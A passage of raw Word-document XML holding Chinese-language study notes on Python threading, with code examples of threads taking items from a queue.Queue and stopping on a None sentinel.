      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主函数入口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E9F29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # global signal_CLEAN_FREEDISK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CD942" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    signal_CLEAN_FREEDISK = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7B26F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E53707" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        signal_CLEAN_FREEDISK.put(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457CADD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1 = Thread(target=Process_1, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B259740" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2 = Thread(target=Process_1, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C28480B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3 = Thread(target=Process_2, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060A703" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F3EFD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6744C519" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A408C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B2D5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        signal_CLEAN_FREEDISK.put(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F279E27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEB0A71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC8DCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9024F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", signal_CLEAN_FREEDISK.qsize())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A6EE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BCBA4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4412E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00954C0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A939AC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>q = queue.Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA51757" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577D2438" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E35A59" w14:textId="3D8B2702" w:rsidR="004C452C" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程从队列中获取数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660FE78" w14:textId="77777777" w:rsidR="00715CAD" w:rsidRDefault="00715CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C729FF0" w14:textId="608930F5" w:rsidR="001D33B2" w:rsidRDefault="001D33B2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidR="00054553">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>except</w:t>
      </w:r>
      <w:r w:rsidR="00054553">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻塞式获取队列元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1313E" w14:textId="77777777" w:rsidR="00715CAD" w:rsidRPr="00715CAD" w:rsidRDefault="00715CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C06EF25" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31115820" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD61F5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016E9CDE" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B84B0F1" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C84BB2E" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def process_queue_elements(my_queue):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0DD0CF" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C103F16" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650F714" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从队列中获取一个元素，如果队列为空，等待直到有元素可用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2363B3" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00B279BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>element = my_queue.get(block=True, timeout=None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4B506" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if element is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A918FB4" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                print("Received stop signal, exiting thread")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D42D524" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F79D85" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0162D02F" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print(f"Processing element: {element}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D95EE2" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C19ECB5" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRPr="0051555F" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0051555F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>except queue.Empty:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A8A36" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0051555F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            print("Queue is empty, waiting for new elements...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B504C6" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4384DA86" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC0222A" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB9D25" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个队列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F85FE5" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B279BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>my_queue = queue.Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0783AAAA" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6136E065" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个线程对象，指定运行的函数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> process_queue_elements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并传递队列作为参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B7C14" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    t = threading.Thread(target=process_queue_elements, args=(my_queue,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3C8A2" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1894BFA1" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D882FA0" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    t.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C97C014" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B08686" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将一些元素放入队列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325928D" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for i in range(5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03741D31" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(f"Adding element {i} to the queue")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18909EEB" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00225430">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>my_queue.put(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D6719" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        time.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD92019" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B115DB" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向队列发送一个停止信号（这里我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> None </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为停止信号）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA043EE" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00225430">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>my_queue.put(None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5AE557" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701D1950" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待线程执行完毕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276102AE" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    t.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0A759" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7328610D" w14:textId="5CEB5843" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print("Main thread finished")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DED58" w14:textId="77777777" w:rsidR="005C789E" w:rsidRDefault="005C789E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BF0851" w14:textId="481B4A56" w:rsidR="005C789E" w:rsidRDefault="003A52C7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>纯</w:t>
      </w:r>
      <w:r w:rsidR="005C789E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻塞式获取队列元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE18F4" w14:textId="77777777" w:rsidR="00D35CB7" w:rsidRDefault="00D35CB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F061DE" w14:textId="04C78EDB" w:rsidR="004322A9" w:rsidRDefault="004322A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段适合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>schedual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定定时任务，而多线程是持续一直开着的场景。因为多线程就不会停。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A49DA29" w14:textId="77777777" w:rsidR="004322A9" w:rsidRDefault="004322A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B346FD" w14:textId="44EDBA6E" w:rsidR="00F45127" w:rsidRPr="006C0E47" w:rsidRDefault="00F45127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>主干程序，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D7210" w14:textId="77777777" w:rsidR="00F45127" w:rsidRDefault="00F45127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DED254C" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBCD470" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRPr="003B1520" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
